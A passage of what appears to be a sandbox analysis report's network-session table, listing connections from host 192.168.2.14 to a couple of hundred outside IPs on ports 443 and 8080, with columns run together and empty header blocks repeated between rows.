                                      21200192.168.2.1444918108.188.70.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21201192.168.2.1447326205.90.110.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21202192.168.2.145375245.189.190.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21203192.168.2.145022013.30.153.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21204192.168.2.1433142128.221.145.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21205192.168.2.144799059.233.41.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21206192.168.2.144129634.157.25.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21207192.168.2.1438722165.76.115.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21208192.168.2.1446840171.75.198.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21209192.168.2.1454084117.215.65.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21210192.168.2.145552291.92.31.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21211192.168.2.1437880103.138.33.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21212192.168.2.1433962112.5.65.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21213192.168.2.1446046181.77.203.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21214192.168.2.145272635.210.18.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21215192.168.2.1439116139.254.65.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21216192.168.2.1455398199.209.162.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21217192.168.2.1438796217.37.121.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21218192.168.2.143601843.238.123.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21219192.168.2.1460862131.116.42.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21220192.168.2.1450070213.83.15.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21221192.168.2.143639675.141.250.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21222192.168.2.145556454.116.190.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21223192.168.2.1442274126.13.200.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21224192.168.2.145372865.229.235.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21225192.168.2.1440644150.222.123.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21226192.168.2.145134850.82.146.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21227192.168.2.1435050150.42.38.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21228192.168.2.1455710174.68.208.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21229192.168.2.1435274179.10.255.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21230192.168.2.1456788166.255.140.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21231192.168.2.1445196211.190.225.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21232192.168.2.1457778147.13.42.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21233192.168.2.144717288.141.115.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21234192.168.2.14424264.72.141.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21235192.168.2.145398635.24.239.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21236192.168.2.1450858195.207.151.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21237192.168.2.1449592176.110.90.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21238192.168.2.14414468.208.154.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21239192.168.2.144146851.50.23.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21240192.168.2.145643413.58.28.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21241192.168.2.1451866115.33.220.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21242192.168.2.1441948126.83.202.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21243192.168.2.1448828220.154.34.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21244192.168.2.1446652158.161.162.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21245192.168.2.1448122102.83.74.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21246192.168.2.1453418175.170.191.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21247192.168.2.1439320103.171.156.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21248192.168.2.145495291.236.231.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21249192.168.2.1448064202.104.164.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21250192.168.2.1446256105.116.207.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21251192.168.2.144342682.63.139.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21252192.168.2.144465440.151.160.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21253192.168.2.145091252.74.185.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21254192.168.2.1447900158.113.134.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21255192.168.2.1437180142.145.111.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21256192.168.2.14434201.7.84.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21257192.168.2.1454196160.153.22.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21258192.168.2.1434158109.208.158.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21259192.168.2.1441496197.227.159.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21260192.168.2.144116817.156.66.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21261192.168.2.1454320126.183.5.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21262192.168.2.144047453.37.154.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21263192.168.2.1459500196.239.250.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21264192.168.2.1439058196.179.12.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21265192.168.2.143789451.38.193.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21266192.168.2.1442744206.50.93.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21267192.168.2.1452944212.167.176.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21268192.168.2.145892483.248.249.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21269192.168.2.143952477.174.138.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21270192.168.2.145624017.129.40.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21271192.168.2.143681212.130.109.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21272192.168.2.1457880221.55.63.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21273192.168.2.145847498.236.68.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21274192.168.2.1459110114.160.93.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21275192.168.2.1456494208.36.235.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21276192.168.2.143746681.129.154.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21277192.168.2.144551875.231.173.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21278192.168.2.1436798216.162.20.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21279192.168.2.1449720135.96.147.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21280192.168.2.1451056104.60.250.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21281192.168.2.1434252115.113.112.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21282192.168.2.1441174151.174.20.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21283192.168.2.1452082174.13.72.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21284192.168.2.1443452133.107.214.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21285192.168.2.1444806112.241.152.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21286192.168.2.1436078116.139.67.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21287192.168.2.144290082.88.66.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21288192.168.2.144737673.223.169.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21289192.168.2.144275236.56.166.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21290192.168.2.1458162181.238.32.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21291192.168.2.1460586124.196.240.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21292192.168.2.143525663.68.224.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21293192.168.2.1450770173.251.31.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21294192.168.2.1441432137.67.45.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21295192.168.2.1460158107.45.154.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21296192.168.2.1434902110.242.164.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21297192.168.2.144224612.122.29.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21298192.168.2.1441758142.160.248.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21299192.168.2.1450414125.161.129.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21300192.168.2.1441790196.51.170.1288080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21301192.168.2.1458378155.14.128.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21302192.168.2.1437604179.11.60.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21303192.168.2.1448160185.42.103.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21304192.168.2.1436428100.211.58.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21305192.168.2.1439218152.212.26.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21306192.168.2.1443992172.140.228.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21307192.168.2.1452648133.167.127.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21308192.168.2.1436694142.214.3.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21309192.168.2.1459538170.80.24.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21310192.168.2.144026084.106.200.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21311192.168.2.1457420200.95.99.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21312192.168.2.145452246.99.12.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21313192.168.2.1453654155.53.134.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21314192.168.2.144398427.199.40.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21315192.168.2.1437226191.177.173.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21316192.168.2.1437014182.238.198.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21317192.168.2.144971663.166.133.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21318192.168.2.1454472180.139.3.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21319192.168.2.144018295.20.101.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21320192.168.2.1450070199.59.233.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21321192.168.2.1449702134.105.67.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21322192.168.2.1433736142.42.88.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21323192.168.2.1454432133.53.163.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21324192.168.2.1459206122.187.198.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21325192.168.2.144073238.214.61.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21326192.168.2.1447180203.130.35.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21327192.168.2.1446088163.231.150.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21328192.168.2.1434098130.127.19.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21329192.168.2.143307062.208.117.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21330192.168.2.143524459.48.4.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21331192.168.2.143688052.37.42.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21332192.168.2.145957639.111.142.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21333192.168.2.1451110103.95.168.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21334192.168.2.1432834183.186.252.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21335192.168.2.145152889.80.87.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21336192.168.2.1437030210.233.235.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21337192.168.2.1457028222.52.170.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21338192.168.2.1433176189.18.199.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21339192.168.2.1439380206.217.246.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21340192.168.2.143357682.207.234.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21341192.168.2.144768888.234.169.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21342192.168.2.144553649.142.223.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21343192.168.2.143675693.101.141.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21344192.168.2.1442346116.244.146.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21345192.168.2.145028227.22.183.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21346192.168.2.145717646.71.41.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21347192.168.2.1438162117.184.110.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21348192.168.2.1448450187.234.103.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21349192.168.2.144398237.203.192.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21350192.168.2.1449138137.37.163.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21351192.168.2.143501488.166.138.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21352192.168.2.1455962142.73.198.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21353192.168.2.1460662211.124.60.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21354192.168.2.144640444.245.168.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21355192.168.2.145322893.149.213.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21356192.168.2.146003623.217.172.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21357192.168.2.1443322135.14.33.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21358192.168.2.1458470144.34.176.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21359192.168.2.144310495.166.223.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21360192.168.2.1452228184.100.114.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21361192.168.2.1451350122.246.92.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21362192.168.2.1445522129.170.31.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21363192.168.2.1457374160.157.82.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21364192.168.2.1457108137.227.75.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21365192.168.2.1449188148.73.7.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21366192.168.2.145363499.139.237.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21367192.168.2.1460804155.66.236.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21368192.168.2.1444458212.117.97.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21369192.168.2.145074870.82.157.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21370192.168.2.1443694173.146.19.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21371192.168.2.1445798191.19.45.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21372192.168.2.14580929.20.148.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21373192.168.2.1460976167.75.150.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21374192.168.2.1454064194.226.148.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21375192.168.2.1459434104.20.106.958080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21376192.168.2.145395690.172.226.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21377192.168.2.145573268.207.75.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21378192.168.2.144695417.174.154.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21379192.168.2.145625445.55.160.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21380192.168.2.1438696141.199.109.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21381192.168.2.1450258191.176.120.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21382192.168.2.1447940154.155.178.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21383192.168.2.145639299.32.124.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21384192.168.2.1437008191.71.194.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21385192.168.2.1453142161.74.181.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21386192.168.2.1454962202.26.31.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21387192.168.2.1434628125.115.251.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21388192.168.2.1435144221.61.186.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21389192.168.2.1452954158.40.231.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21390192.168.2.145379220.254.52.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21391192.168.2.1436504181.24.78.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21392192.168.2.143949069.57.106.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21393192.168.2.1446618194.152.219.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21394192.168.2.143446287.157.242.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21395192.168.2.143517654.196.218.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21396192.168.2.145998447.104.74.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21397192.168.2.144769877.181.148.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21398192.168.2.144158870.108.252.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21399192.168.2.144845849.145.1.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21400192.168.2.1457990112.171.106.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21401192.168.2.146037680.59.51.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21402192.168.2.143748814.109.87.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21403192.168.2.144160435.91.199.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21404192.168.2.1456836172.152.163.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21405192.168.2.1458864139.149.176.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21406192.168.2.1450414179.44.70.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21407192.168.2.144567257.53.11.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21408192.168.2.1448818166.211.58.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21409192.168.2.1451274180.115.59.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21410192.168.2.1435614119.13.107.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21411192.168.2.144654051.98.182.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21412192.168.2.1449632164.127.214.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21413192.168.2.1444960187.144.136.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21414192.168.2.145615489.240.119.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21415192.168.2.144897631.137.229.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21416192.168.2.1452436105.110.46.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21417192.168.2.1456480171.180.22.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21418192.168.2.1441884140.113.87.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21419192.168.2.1454372109.196.166.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21420192.168.2.1451168181.132.113.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21421192.168.2.145723499.49.6.247443
                                      TimestampBytes transferredDirectionData


